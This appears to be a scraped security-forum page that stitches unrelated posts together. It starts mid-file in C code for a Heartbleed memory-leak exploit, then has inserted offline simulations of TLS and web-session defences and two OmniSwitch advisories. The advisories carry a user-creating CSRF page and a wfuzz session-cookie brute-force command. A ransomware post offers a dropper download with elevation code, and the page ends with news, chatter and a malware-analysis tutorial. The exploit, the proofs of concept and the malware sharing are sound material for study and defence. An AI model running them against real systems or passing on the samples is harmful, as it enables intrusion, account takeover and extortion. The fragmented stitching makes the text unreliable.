            printf("[ --type|-t <n> - select exploit to try\n");
            printf("[ 0 = null length\n");
            printf("[ 1 = max leak\n");
            printf("[ n = heartbeat payload_length\n");
            printf("[\n");
            printf("[ --verbose|-v - output leak to screen\n");
            printf("[ --help|-h - this output\n");
            printf("[\n");
            exit(0);
        }

        int main(int argc, char* argv[]){
            int ret, port, userc, index;
            int type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9;
            int loop = 0;
            struct hostent *h;
            connection* c;
            char *host, *file;
            int ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;
            printf("[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\n");
            printf("[ =============================================================\n");
            static struct option options[] = {
                {"server", 1, 0, 's'},
                {"port", 1, 0, 'p'},
                {"file", 1, 0, 'f'},
                {"type", 1, 0, 't'},
                {"bind", 1, 0, 'b'},
                {"verbose", 0, 0, 'v'},
                {"precmd", 1, 0, 'c'},
                {"loop", 0, 0, 'l'},
                {"help", 0, 0,'h'}
            };
            while(userc != -1) {
                userc = getopt_long(argc,argv,"s:p:f:t:b:c:lvh",options,&index);
                switch(userc) {
                    case -1:
                        break;
                    case 's':
                        if(ihost==0){
                            ihost = 1;
                            h = gethostbyname(optarg);
                            if(h==NULL){
                                printf("[!] FATAL: unknown host '%s'\n",optarg);
                                exit(1);
                            }
                            host = malloc(strlen(optarg) + 1);
                            if(host==NULL){
                                printf("[ error in malloc()\n");
                                exit(0);
                            }
                            sprintf(host,"%s",optarg);
                        }
                        break;
                    case 'p':
                        if(iport==0){
                            port = atoi(optarg);
                            iport = 1;
                        }
                        break;
                    case 'f':
                        if(ifile==0){
                            file = malloc(strlen(optarg) + 1);
                            if(file==NULL){
                                printf("[ error in malloc()\n");
                                exit(0);
                            }
                            sprintf(file,"%s",optarg);
                            ifile = 1;
                        }
                        break;
                    case 't':
                        if(itype==0){
                            type = atoi(optarg);
                            itype = 1;
                        }
                        break;
                    case 'h':
                        usage();
                        break;
                    case 'b':
                        if(ihost==0){
                            ihost = 1;
                            host = malloc(strlen(optarg)+1);
                            if(host==NULL){
                                printf("[ error in malloc()\n");
                                exit(0);
                            }
                            sprintf(host,"%s",optarg);
                            bind = 1;
                        }
                        break;
                    case 'c':
                        if(iprecmd == 0){
                            iprecmd = 1;
                            precmd = atoi(optarg);
                        }
                        break;
                    case 'v':
                        verbose = 1;
                        break;
                    case 'l':
                        loop = 1;
                        break;
                    default:
                        break;
                }
            }
            if(ihost==0||iport==0||ifile==0||itype==0||type < 0){
                printf("[ try --help\n");
                exit(0);
            }
            ssl_init();
            if(bind==0){
                ret = tcp_connect(host, port);
                pre_cmd(ret, precmd, verbose);
                c = tls_connect(ret);
                heartbleed(c,type);
                while(repeat==1){
                    sneakyleaky(c,file,verbose);
                }
                while(loop==1){
                    printf("[ entered heartbleed loop\n");
                    first=0;
                    repeat=1;
                    heartbleed(c,type);
                    while(repeat==1){
                        sneakyleaky(c,file,verbose);
                    }
                }
                printf("[ done.\n");
                exit(0);
            }
            else{
                int sd, pid, i;
                ret = tcp_bind(host, port);
                while(1){
                    sd=accept(ret,0,0);
                    if(sd==-1){
                        printf("[!] FATAL: problem with accept()\n");
                        exit(0);
                    }
                    if(pid=fork()){
                        close(sd);
                    }
                    else{
                        c = tls_bind(sd);
                        pre_cmd(ret, precmd, verbose);
                        heartbleed(c,type);
                        while(repeat==1){
                            sneakyleaky(c,file,verbose);
                        }
                        while(loop==1){
                            printf("[ entered heartbleed loop\n");
                            first=0;
                            repeat=0;
                            heartbleed(c,type);
                            while(repeat==1){
                                sneakyleaky(c,file,verbose);
                            }
                        }
                        printf("[ done.\n");
                        exit(0);
                    }
                }
            }
        }

    Source
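Added example, not part of the post above: a no-network simulation of the "downgrade dance" the POODLE text describes and of TLS_FALLBACK_SCSV (RFC 7507), the countermeasure it recommends, so the two failure modes (attacker forces SSL 3.0; server refuses because the fallback is signalled, or because SSL 3.0 is disabled) can be stepped through side by side. The version numbers and the SCSV cipher-suite value are the real wire constants; the class and function names and the "attacker on path" flag are constructed for illustration.

```python
# Wire constants (ProtocolVersion major.minor and the RFC 7507 signalling suite).
SSL30, TLS10, TLS11, TLS12 = 0x0300, 0x0301, 0x0302, 0x0303
TLS_FALLBACK_SCSV = 0x5600          # cipher-suite value reserved by RFC 7507
AES128_CBC_SHA = 0x002F             # TLS_RSA_WITH_AES_128_CBC_SHA, a CBC suite
NAMES = {SSL30: "SSL 3.0", TLS10: "TLS 1.0", TLS11: "TLS 1.1", TLS12: "TLS 1.2"}


class HandshakeDropped(Exception):
    """Raised when the (simulated) network eats the ClientHello."""


class Server:
    """Constructed server model: a highest and lowest accepted version, and
    whether it understands the fallback SCSV."""

    def __init__(self, max_version, min_version=SSL30, supports_scsv=True):
        self.max_version = max_version
        self.min_version = min_version
        self.supports_scsv = supports_scsv

    def handle_client_hello(self, client_version, cipher_suites):
        # RFC 7507 section 3: if the client signals a fallback but offers less
        # than the server's highest version, refuse instead of downgrading.
        if (self.supports_scsv and TLS_FALLBACK_SCSV in cipher_suites
                and client_version < self.max_version):
            return ("alert", "inappropriate_fallback")
        chosen = min(client_version, self.max_version)
        if chosen < self.min_version:
            return ("alert", "protocol_version")   # e.g. SSL 3.0 disabled
        return ("server_hello", chosen)


def deliver(server, client_version, cipher_suites, attacker_on_path):
    """The network between client and server. An active attacker interferes
    with every handshake that offers TLS 1.0 or later, as the post describes."""
    if attacker_on_path and client_version >= TLS10:
        raise HandshakeDropped()
    return server.handle_client_hello(client_version, cipher_suites)


def downgrade_dance(server, client_versions, send_scsv, attacker_on_path):
    """Client behaviour: offer the highest version first and retry with the
    next lower one whenever a handshake fails. Returns ("ok", version) or
    ("failed", reason)."""
    for attempt, version in enumerate(sorted(client_versions, reverse=True)):
        suites = [AES128_CBC_SHA]
        if send_scsv and attempt > 0:
            suites.append(TLS_FALLBACK_SCSV)   # only on retries (RFC 7507 s.4)
        try:
            reply = deliver(server, version, suites, attacker_on_path)
        except HandshakeDropped:
            continue                           # the "dance": step down and retry
        if reply[0] == "server_hello":
            return ("ok", reply[1])
        return ("failed", reply[1])            # a real alert ends the dance
    return ("failed", "no version accepted")


ALL_VERSIONS = [SSL30, TLS10, TLS11, TLS12]

if __name__ == "__main__":
    legacy = Server(TLS12, supports_scsv=False)
    patched = Server(TLS12)
    no_ssl3 = Server(TLS12, min_version=TLS10, supports_scsv=False)
    for label, result in [
        ("no attacker, legacy server", downgrade_dance(legacy, ALL_VERSIONS, False, False)),
        ("attacker, no SCSV", downgrade_dance(legacy, ALL_VERSIONS, False, True)),
        ("attacker, SCSV on both sides", downgrade_dance(patched, ALL_VERSIONS, True, True)),
        ("attacker, SSL 3.0 disabled", downgrade_dance(no_ssl3, ALL_VERSIONS, False, True)),
    ]:
        print(f"{label}: {result[0]} {NAMES.get(result[1], result[1])}")
```

The second scenario is the POODLE precondition: three dropped handshakes and the client settles on SSL 3.0 with a CBC suite. The SCSV only helps when both sides implement it, which is why the post says clients and servers both need the upgrade; disabling SSL 3.0 outright removes the precondition regardless.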
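Added example, not part of the post or of the exploit's author: the comment header of the exploit above attributes the leak to a missing bounds check on the user-supplied heartbeat payload length. The snippet below models the message layout of RFC 6520 (type byte, 16-bit payload_length, payload, at least 16 bytes of padding) and shows the unchecked read next to the check that the fixed OpenSSL applies, using a byte string as a constructed stand-in for adjacent heap memory. Function names are mine, not OpenSSL's.

```python
import struct

HB_REQUEST, HB_RESPONSE = 1, 2
HB_HEADER = 1 + 2          # type byte + 16-bit payload_length
MIN_PADDING = 16           # RFC 6520 section 4 minimum padding


def build_heartbeat(payload, claimed_length=None, padding=b"\x00" * MIN_PADDING):
    """Encode a HeartbeatMessage. claimed_length lets a test state a
    payload_length that does not match the bytes actually sent."""
    length = len(payload) if claimed_length is None else claimed_length
    return bytes([HB_REQUEST]) + struct.pack("!H", length) + payload + padding


def read_payload_unchecked(record, adjacent_memory):
    """The pre-1.0.1g behaviour in miniature: copy payload_length bytes from
    after the header, whatever the record actually contains. adjacent_memory
    is a constructed stand-in for whatever followed the record on the heap."""
    (payload_length,) = struct.unpack("!H", record[1:3])
    buffer = record + adjacent_memory
    return buffer[HB_HEADER:HB_HEADER + payload_length]


def read_payload_checked(record):
    """The check added in the fix: header + payload + minimum padding must fit
    inside the record, otherwise the message is silently discarded (None)."""
    if len(record) < HB_HEADER + MIN_PADDING:
        return None
    (payload_length,) = struct.unpack("!H", record[1:3])
    if HB_HEADER + payload_length + MIN_PADDING > len(record):
        return None
    return record[HB_HEADER:HB_HEADER + payload_length]


if __name__ == "__main__":
    honest = build_heartbeat(b"ping")
    lying = build_heartbeat(b"", claimed_length=0xFFFF)   # 19 bytes on the wire
    fake_heap = b"\xee" * 0x10000                           # constructed neighbour memory
    print("honest, checked  :", read_payload_checked(honest))
    print("lying,  checked  :", read_payload_checked(lying))
    print("lying,  unchecked:", len(read_payload_unchecked(lying, fake_heap)), "bytes")
```

Note the shape of the failure: the 19-byte record itself is well formed, so a length check against the record's own header is not enough; the check has to compare the claimed payload_length with the number of bytes that actually arrived.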
  15. Advisory: Alcatel-Lucent OmniSwitch Web Interface Cross-Site Request Forgery

During a penetration test, RedTeam Pentesting discovered a vulnerability in the management web interface of an Alcatel-Lucent OmniSwitch 6450. The management web interface has no protection against cross-site request forgery attacks. This allows specially crafted web pages to change the switch configuration and create users, if an administrator accesses the website while being authenticated in the management web interface.

Details
=======

Product: Alcatel-Lucent OmniSwitch 6450, 6250, 6850E, 9000E, 6400, 6855, 6900, 10K, 6860
Affected Versions: All Releases:
  AOS 6.4.5.R02
  AOS 6.4.6.R01
  AOS 6.6.4.R01
  AOS 6.6.5.R02
  AOS 7.3.2.R01
  AOS 7.3.3.R01
  AOS 7.3.4.R01
  AOS 8.1.1.R01
Fixed Versions: -
Vulnerability Type: Cross-site request forgery
Security Risk: medium
Vendor URL: http://enterprise.alcatel-lucent.com/?product=OmniSwitch6450&page=overview
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-004
Advisory Status: published
CVE: CVE-2015-2805
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2805

Introduction
============

"The Alcatel-Lucent OmniSwitch 6450 Gigabit and Fast Ethernet Stackable LAN Switches are the latest value stackable switches in the OmniSwitch family of products. The OmniSwitch 6450 was specifically built for versatility offering optional upgrade paths for 10 Gigabit stacking, 10 Gigabit Ethernet uplinks, from Fast to Gigabit user ports (L models) and Metro Ethernet services." (from the vendor's homepage)

More Details
============

The management web interface of the OmniSwitch 6450 can be accessed using a web browser via HTTP. The web interface allows creating new user accounts; in this case an HTTP request like the following is sent to the switch:

POST /sec/content/sec_asa_users_local_db_add.html HTTP/1.1
Host: [...]
Cookie: session=sess_15739
Content-Type: application/x-www-form-urlencoded
Content-Length: 214

EmWeb_ns:mip:2.T1:I1=attacker
&EmWeb_ns:mip:244.T1:O1=secret
&EmWeb_ns:mip:246.T1:O2=-1
&EmWeb_ns:mip:248.T1:O3=
&EmWeb_ns:mip:249.T1:O4=1
&EmWeb_ns:mip:250.T1:O5=4

This request creates a user "attacker" with the password "secret". All other parameters are static. All POST parameters can be predicted by attackers. This means that requests of this form can be prepared by attackers and sent from any web page the user visits in the same browser. If the user is authenticated to the switch, a valid session cookie is included in the request automatically, and the action is performed.

In order to activate the new user for the web interface it is necessary to enable the respective access privileges in the user's profile. This can also be done via the web interface. Then the HTTP POST request looks like the following:

POST /sec/content/os6250_sec_asa_users_local_db_family_mod.html HTTP/1.1
Host: [...]
Cookie: session=sess_15739
Content-Type: application/x-www-form-urlencoded
Content-Length: 167

EmWeb_ns:mip:2.T1:I1=attacker
&EmWeb_ns:mip:4.T1:O1=
&EmWeb_ns:mip:5.T1:O2=
&EmWeb_ns:mip:6.T1:O3=4294967295
&EmWeb_ns:mip:7.T1:O4=4294967295

This request sets all access privileges for the user "attacker" and is again completely predictable.

Proof of Concept
================

Visiting the following HTML page will create a new user via the switch's management web interface, if the user is authenticated at the switch:

------------------------------------------------------------------------
<html>
  <head>
    <title>Alcatel-Lucent OmniSwitch 6450 create user via CSRF</title>
  </head>
  <body>
    <form action="" method="POST" id="CSRF" style="visibility:hidden">
      <input type="hidden" name="EmWeb_ns:mip:2.T1:I1" value="attacker" />
      <input type="hidden" name="EmWeb_ns:mip:244.T1:O1" value="secret" />
      <input type="hidden" name="EmWeb_ns:mip:244.T1:O2" value="-1" />
      <input type="hidden" name="EmWeb_ns:mip:244.T1:O3" value="" />
      <input type="hidden" name="EmWeb_ns:mip:244.T1:O4" value="1" />
      <input type="hidden" name="EmWeb_ns:mip:244.T1:O5" value="4" />
    </form>
    <script>
      document.getElementById("CSRF").submit();
    </script>
  </body>
</html>
------------------------------------------------------------------------

Workaround
==========

Disable the web interface by executing the following commands:

AOS6:
no ip service http
no ip service secure-http

AOS 7/8:
ip service http admin-state disable

If this is not possible, use a dedicated browser or browser profile for managing the switch via the web interface.

Fix
===

Upgrade the firmware to a fixed version. According to the vendor, the fixed versions will be available at the end of July 2015.

Security Risk
=============

If attackers trick a logged-in administrator into visiting an attacker-controlled web page, the attacker can perform actions and reconfigure the switch. In this situation an attacker can create an additional user account on the switch for future access. While a successful attack results in full access to the switch, the attack is hard to exploit because attackers need to know the IP address of the switch and get an administrative user to access an attacker-controlled web page. The vulnerability is therefore rated as a medium risk.

Timeline
========

2015-03-16 Vulnerability identified
2015-03-25 Customer approves disclosure to vendor
2015-03-26 CVE number requested
2015-03-31 CVE number assigned
2015-04-01 Vendor notified
2015-04-02 Vendor acknowledged receipt of advisories
2015-04-08 Requested status update from vendor, vendor is investigating
2015-04-29 Requested status update from vendor, vendor is still investigating
2015-05-22 Requested status update from vendor
2015-05-27 Vendor is working on the issue
2015-06-05 Vendor notified customers
2015-06-08 Vendor provided details about affected versions
2015-06-10 Advisory released

RedTeam Pentesting GmbH

Source
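The two POSTs in the advisory succeed because the only thing the switch checks is the session cookie, which the browser attaches to a forged request just as readily as to a legitimate one. The following Python is an added example, not code from the advisory or from Alcatel-Lucent: a hardened stand-in for the user-creation handler that requires a per-session synchronizer token (derived with HMAC from a hypothetical server key and a hypothetical per-session secret) and rejects requests whose Origin or Referer is not the switch's own address (192.0.2.10, a hypothetical value). It replays the advisory's proof-of-concept body offline to show the forged request being refused and the same request succeeding when it carries the token.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlparse

# Constructed server-side state (hypothetical): the logged-in session from the advisory's
# request, and a per-session secret from which the anti-CSRF token is derived.
SESSIONS = {"sess_15739": secrets.token_bytes(32)}
SERVER_KEY = secrets.token_bytes(32)          # hypothetical key held only by the web server
TRUSTED_ORIGIN = "http://192.0.2.10"          # hypothetical switch address (documentation range)


def csrf_token(session_id):
    """Synchronizer token, embedded as a hidden field in every state-changing form of this
    session. The attacker's page cannot read it, so a forged POST cannot include it."""
    secret = SESSIONS[session_id]
    return hmac.new(SERVER_KEY, session_id.encode() + secret, hashlib.sha256).hexdigest()


def token_valid(session_id, presented):
    if session_id not in SESSIONS or not presented:
        return False
    return hmac.compare_digest(csrf_token(session_id), presented)


def origin_allowed(headers):
    """Second line of defence: browsers set Origin (or Referer) on cross-site POSTs and the
    attacker's page cannot spoof it. Fail closed when both headers are absent."""
    origin = headers.get("Origin") or headers.get("Referer")
    if not origin:
        return False
    o, t = urlparse(origin), urlparse(TRUSTED_ORIGIN)
    return (o.scheme, o.netloc) == (t.scheme, t.netloc)


def handle_add_user(headers, cookies, body):
    """Hardened stand-in for sec_asa_users_local_db_add.html. The vulnerable handler only
    checked the session cookie, which the browser attaches to the forged request as well."""
    session_id = cookies.get("session")
    if session_id not in SESSIONS:
        return 401, "login required"
    if not origin_allowed(headers):
        return 403, "cross-site request rejected (origin)"
    params = {k: v[0] for k, v in parse_qs(body).items()}
    if not token_valid(session_id, params.get("csrf_token")):
        return 403, "cross-site request rejected (token)"
    username = params.get("EmWeb_ns:mip:2.T1:I1", "")
    return 200, "user %s created" % username


# The advisory's proof of concept, replayed offline: the victim's cookie rides along,
# the Origin is the attacker's page and no token is present.
FORGED_BODY = ("EmWeb_ns:mip:2.T1:I1=attacker&EmWeb_ns:mip:244.T1:O1=secret"
               "&EmWeb_ns:mip:246.T1:O2=-1&EmWeb_ns:mip:248.T1:O3="
               "&EmWeb_ns:mip:249.T1:O4=1&EmWeb_ns:mip:250.T1:O5=4")


def demo():
    victim_cookies = {"session": "sess_15739"}
    forged = handle_add_user({"Origin": "http://attacker.example"}, victim_cookies, FORGED_BODY)
    # The same request submitted from the switch's own form, carrying the token.
    legit_body = FORGED_BODY + "&csrf_token=" + csrf_token("sess_15739")
    legit = handle_add_user({"Origin": TRUSTED_ORIGIN}, victim_cookies, legit_body)
    return forged, legit


if __name__ == "__main__":
    print(demo())
```

The Origin check alone is not sufficient on its own (older clients may omit the header, and some proxies strip Referer), which is why the token check is the primary control and the origin check only shortens the path to a rejection.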
  16. Advisory: Alcatel-Lucent OmniSwitch Web Interface Weak Session ID

During a penetration test, RedTeam Pentesting discovered a vulnerability in the management web interface of an Alcatel-Lucent OmniSwitch 6450. This interface uses easily guessable session IDs, which allows attackers to authenticate as a currently logged-in user and perform administrative tasks.

Details
=======

Product: Alcatel-Lucent OmniSwitch 6450, 6250, 6850E, 9000E, 6400, 6855
Affected Versions:
  AOS 6.4.5.R02
  AOS 6.4.6.R01
  AOS 6.6.4.R01
  AOS 6.6.5.R02
Fixed Versions:
  AOS
  AOS
Vulnerability Type: Session Management - low identifier entropy
Security Risk: high
Vendor URL: http://enterprise.alcatel-lucent.com/?product=OmniSwitch6450&page=overview
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-003
Advisory Status: published
CVE: CVE-2015-2804
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2804

Introduction
============

"The Alcatel-Lucent OmniSwitch 6450 Gigabit and Fast Ethernet Stackable LAN Switches are the latest value stackable switches in the OmniSwitch family of products. The OmniSwitch 6450 was specifically built for versatility offering optional upgrade paths for 10 Gigabit stacking, 10 Gigabit Ethernet uplinks, from Fast to Gigabit user ports (L models) and Metro Ethernet services." (from the vendor's homepage)

More Details
============

The management web interface of the OmniSwitch 6450 can be accessed using a web browser via HTTP. A switch with the example IP is accessible via the following URL:

A client is then redirected to the following URL:

For unauthenticated users the URL displays a login form and sets a session cookie with a session ID. A request to the URL with the command line HTTP client cURL shows the Set-Cookie header:

$ curl -I
HTTP/1.1 200 OK
Date: Tue, 17 Mar 2015 08:25:42 GMT
Server: Agranat-EmWeb/R5_2_4
[...]
Set-Cookie: session=sess_11012;PATH=/

The session cookie has the name "session" and its value begins with the string "sess_". By repeatedly requesting the URL with cURL it became obvious that the suffix is always a number between 1 and 32,000. This suggests that there are only about 32,000 possible session IDs, resulting in only 15 bits of entropy. Our tests showed that it was possible to get a throughput of about 50 HTTP requests per second. This means that in order to try every possible session ID an attacker will need at most 11 minutes. On average, the time it takes to find a valid session ID for an active user is even lower.

Proof of Concept
================

For an attacker it is very easy to distinguish between a valid and an invalid session ID by looking at the HTTP response size. During our tests, requesting an invalid session ID always returned the login form, which was 3027 bytes in length. With a valid session ID, the management web interface is returned by the webserver and the response is larger. A number of requests in the range of the possible session cookies can be easily executed using wfuzz [0]:

------------------------------------------------------------------------
./wfuzz.py -z range,1-32000 --hl 3027 -H "Cookie: session=sess_FUZZ"
------------------------------------------------------------------------

Workaround
==========

Administrators should avoid using the management web interface and use the serial console or administer the switch over SSH instead. The web interface can be disabled by executing the following commands:

no ip service http
no ip service secure-http

If the web interface is needed, it must be ensured that only authorised persons are able to even connect to the web server. In addition, the HTTP session timeout can be lowered to one minute with the following command:

session timeout http 1

Fix
===

Upgrade the firmware to a fixed version.

Security Risk
=============

The vulnerability poses a high risk. An attacker can easily authenticate to a switch with the privileges of another user who is currently logged in. The attack is simple and fast. The only precondition is that a user is already using the switch during the attack. Attackers might actively trick administrators into logging in by social engineering.

Timeline
========

2015-03-16 Vulnerability identified
2015-03-25 Customer approves disclosure to vendor
2015-03-26 CVE number requested
2015-03-31 CVE number assigned
2015-04-01 Vendor notified
2015-04-02 Vendor acknowledged receipt of advisories
2015-04-08 Requested status update from vendor, vendor is investigating
2015-04-29 Requested status update from vendor, vendor is still investigating
2015-05-22 Requested status update from vendor
2015-05-27 Vendor is working on the issue
2015-06-05 Vendor notified customers
2015-06-08 Vendor provided details about affected versions
2015-06-10 Advisory released

References
==========

[0] https://github.com/xmendez/wfuzz

RedTeam Pentesting GmbH

Source
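The figures in the advisory (a numeric suffix in 1..32,000, about 50 requests per second, a 3027-byte login page for an invalid ID) are everything the attack needs. The Python below is an added example, not part of the advisory or of wfuzz: it derives the entropy and worst-case search time from those figures, runs the same enumeration against a constructed stand-in for the switch's web server that reproduces only the observable the attack relies on (a different response size for a live session; nothing is contacted over the network), and generates what the cookie should look like instead. The FakeSwitch class and the live session IDs it holds are constructed for the example.

```python
import math
import secrets

LOGIN_PAGE_LEN = 3027     # size of the login form returned for an invalid session ID (advisory)
MAX_ID = 32000            # largest numeric suffix observed in "sess_<n>" cookies (advisory)
RATE = 50.0               # HTTP requests per second achieved during the test (advisory)


def id_entropy_bits(keyspace):
    """Bits of entropy of an identifier drawn uniformly from `keyspace` values."""
    return math.log2(keyspace)


def exhaustive_search_seconds(keyspace, rate):
    """Worst case: every ID tried once. On average a live session is hit after half of them."""
    return keyspace / rate


class FakeSwitch:
    """Constructed stand-in for the switch's web server (no network traffic). It reproduces
    only what the attack observes: a live session gets the management UI, anything else the
    login form of a fixed size."""

    def __init__(self, active_sessions):
        self.active = set(active_sessions)
        self.requests = 0

    def get(self, cookie_header):
        self.requests += 1
        sid = cookie_header.partition("session=")[2]
        if sid in self.active:
            return b"<html>" + b"<!-- management ui -->" * 200 + b"</html>"   # larger than the form
        return b"x" * LOGIN_PAGE_LEN                                          # login form


def enumerate_sessions(server, max_id=MAX_ID, login_len=LOGIN_PAGE_LEN):
    """Same idea as the advisory's wfuzz run: try sess_1 .. sess_<max_id> and keep every
    cookie whose response is not the login form."""
    return [f"sess_{n}" for n in range(1, max_id + 1)
            if len(server.get(f"session=sess_{n}")) != login_len]


def secure_session_id():
    """What the cookie should look like instead: 256 bits from the OS CSPRNG."""
    return "sess_" + secrets.token_urlsafe(32)


if __name__ == "__main__":
    print(f"{id_entropy_bits(MAX_ID):.1f} bits; worst case "
          f"{exhaustive_search_seconds(MAX_ID, RATE) / 60:.1f} minutes at {RATE:.0f} req/s")
    switch = FakeSwitch({"sess_11012"})
    print("live sessions:", enumerate_sessions(switch), "after", switch.requests, "requests")
    print("secure id:", secure_session_id(), f"({id_entropy_bits(2 ** 256):.0f} bits)")
```

The response-size oracle is what makes the enumeration cheap; a server that returned the login form with a fresh cookie for an unknown ID at the same size would still be brute-forceable, only less conveniently. The fix is the keyspace, not the oracle: an unguessable identifier makes the request budget irrelevant.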
  17. Hello Andrei! I hope you stay with us for as long as possible.
  18. And yet I don't think they claimed to be part of the CIA. Why? Most likely the people at "1337day" used the CIA excuse and a dissatisfied customer burned them. Anyway, how long did they think they would get away with it?
  19. Cryptographic ransom. Delivered via email. Smart install maker -> Delphi. Attached: dropper and extracted ransom. Installs to %Program Files%, runs via HKLM Run key. Uses https://github.com/SnakeDoctor/FGInt. Changes the desktop wallpaper to its own with the ransom message. The wallpaper can be found inside the ransom's resources.

Email: trojanencoder@aol.com

Target extensions

Autoelevate in loop:

pExecInfo.cbSize = 60;
pExecInfo.hwnd = GetFocus();
pExecInfo.fMask = 1280;
pExecInfo.lpVerb = "runas";
pExecInfo.lpFile = (LPCSTR)sub_404E98();
pExecInfo.lpParameters = (LPCSTR)sub_404E98();
pExecInfo.nShow = 1;
while ( !ShellExecuteExA(&pExecInfo) )
  Sleep_0(0x7D0u);

VT
https://www.virustotal.com/en/file/add92cb6047f2fb412dcbcb5a2d8ee7fad56091ccd6667105d977b010a33b561/analysis/1433824692/
https://www.virustotal.com/en/file/94f36b586379137a58862ca46cd1cd6c01c20ea9f56755f7b193f0c97b7a57bd/analysis/1433824702/

Derivative of this https://securelist.ru/blog/issledovaniya/24070/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/ ( use google translate )

Download pass: infected

Source
  20. 'Browsing should be private' says NSA overlord Black Hat Barack has issued a Memorandum – an executive order in all but name, and an instrument the president has used more than any of his predecessors – to all Federal website sysadmins, informing them to deprecate HTTP and roll on with HTTPS. The HTTPS-Only Standard was proposed by the US' Chief Information Officer Tony Scott, formerly of VMWare. Though the standard has been criticised by a database admin at NASA as a "top-down solution", it has also been described as a "great first step" by the American Civil Liberties Union. The Memorandum [PDF] itself states that "all browsing activity should be considered private and sensitive". The standard is intended to eliminate "inconsistent, subjective determinations across agencies regarding which content or browsing activity is sensitive in nature", Tony Scott said. Source
  21. ) but the thing is they pronounce "nasa" wrong... ========================================== Anyway, if they have gotten to the point of interviewing Guccifer, who is a sorry case and deserves every year he spends in prison, they are in a sorry state themselves. God, at his age, instead of having kids and a family, he keeps busy with the nonsense that 13/14-year-old kids with gaming communities do. EPIC TROLL! Update name to: " SucSiFier " I don't understand why they only promote this crap that sells well "commercially"....
  22. Static Malware Analysis

Starting here, I would like to share the results of my recent research into malware analysis. We will begin with some basics and proceed to advanced levels. In this first installment, we will discuss the techniques involved in static analysis of malware. I will also include some files for illustrative purposes in this document. Before we directly move onto the analysis part, let us set up context with some definitions.

What is Malware?

Malware is any software that does something that causes detriment to the user, computer, or network—such as viruses, trojan horses, worms, rootkits, scareware, and spyware.

Malware Static Analysis

Basic static analysis consists of examining the executable file without viewing the actual instructions. Basic static analysis can confirm whether a file is malicious, provide information about its functionality, and sometimes provide information that will allow you to produce simple network signatures. Basic static analysis is straightforward and can be quick, but it’s largely ineffective against sophisticated malware, and it can miss important behaviors. Enough with definitions — let’s get down to Malware Static Analysis Techniques.

Malware Static Analysis Techniques

Uploading the results to VirusTotal

The very first technique in static analysis is to upload the suspicious executable to VirusTotal, which runs the executable against several AV solutions and gives the result. For example, the below file states that the detection ratio is 17 out of 57.

Finding strings

Searching through the strings can be a simple way to get hints about the functionality of a program. For example, if the program accesses a URL, then you will see the URL accessed stored as a string in the program. Microsoft has a utility called “Strings”.
When Strings searches an executable for ASCII and Unicode strings, it ignores context and formatting, so that it can analyse any file type and detect strings across an entire file (though this also means that it may identify bytes of characters as strings when they are not). Strings searches for a three-letter or greater sequence of ASCII and Unicode characters, followed by a string termination character. Below are some examples of strings from which important information can be revealed. Using the Strings utility, files can be searched with the following command at the cmd:

Strings <filename>

Example 1: Below is a string extraction of keywords from a malicious executable. As we can see, it gives us good information: functions like “FindNextFileA” and “FindFirstFileA” show that this executable will search for a file, and combining that with “CopyFileA” means that it will find a file and replace it with another file. Another important point to note is about “Kerne132.dll”. This is a misleading name and should not be confused with “Kernel32.dll”.

Example 2: Below is another extraction from the Strings utility. It shows us that the usage of “CreateProcessA” will create a process. Commands like “Exec” and “sleep” are used to control a remote file. It can be a bot as well, and then there is an IP field, which can be the IP of a controlling server.

Example 3: Below is another example of an extraction using Strings. Interesting fields are “InternetOpenURLA”, which states that it will connect with some external server to download something, and then we have an http:// URL also, which even clarifies the server address from which it will connect and download.

How to check if malware code is obfuscated or not?

Often malware writers obfuscate their code so that the files are hard to read. When a packed program runs, a wrapper program also runs around it to unpack it.
With static analysis, it is really hard to predict which files are packed unless it is clearly evident that they are. For example, tools like PEiD are sometimes able to tell that the files are packed. In the below figure, it is clearly evident that the file is packed with UPX. Files which are UPX packed can be unpacked with the following command:

upx -o <newfilename> -d <packedfilename>

Information gathering from Portable Executable (PE) file format

The PE file format is used by Windows executables, DLLs etc. It contains the necessary information for the Windows OS loader to run the code. While examining PE files, we can analyse which functions have been imported and exported and what type of linking is there, i.e. runtime, static or dynamic.

PE file sections

A PE file contains a header and some more important sections. Under these sections there is some useful information. Let’s understand these sections as well.

.text: This contains the executable code.
.rdata: This section holds read-only globally accessible data.
.data: Stores global data accessed throughout the program.
.rsrc: This section stores resources needed by the executable.

Most often malware writers use dynamic linking in their code. For example, with the use of the tool Dependency Walker, we can see in the below screenshot that under WININET.dll are functions like “InternetOpenUrlA”, which states that this malware will make a connection with some external server.

Note: Wininet.dll contains higher level networking functions that implement protocols such as FTP, HTTP and NTP.

Under the header, there is a subsection named “IMAGE_FILE_HEADER”, which contains the timestamp field. This timestamp shows the compile time of the executable. This is very important information, since if the time is old, then there may be a case that AV solutions might have a signature around it.
However, this field is not reliable, since the compile time can be changed easily by the malware writer.

Suppose from static analysis an analyst predicts that the executable will create a process, and then suppose the following exec and sleep command is found, but no information is found about the respective DLL which has a function to connect with another server. In that case, the resource is hidden within the executable. Open the .rsrc section of the PE file with a tool like Resource Hacker to gain more information regarding the malware.

Below is the analysis of the above resource using PEview.

As we have learnt, with static analysis there is very little information that can be gathered, but it is very useful too. In a coming article, I will bring in dynamic analysis, though basic, to the rescue.

Source

MALWARE ANALYSIS BASICS - PART 2

Dynamic Analysis Techniques

As we have covered the malware analysis basics with static techniques here, this post is all about performing the basic analysis of malware using dynamic techniques. As we have seen in the previous post, the ability to fully perform malware analysis is very much restricted using static techniques, either due to obfuscation, packing, or the analyst having exhausted the available static analysis techniques.

Precautions

Before performing dynamic malware analysis, be sure to do it in a safe environment. Consider deploying a Windows virtual machine and using VMware for provisioning virtual machines. You should also take a snapshot of the virtual machine before executing the malicious binaries so that the safe state can be easily restored.

Analyzing with Process Monitor

Process Monitor is an advanced monitoring tool for Windows that provides a way to monitor certain registry, file system, network, process, and thread activities. Process Monitor monitors all system calls it can gather as soon as it is run.
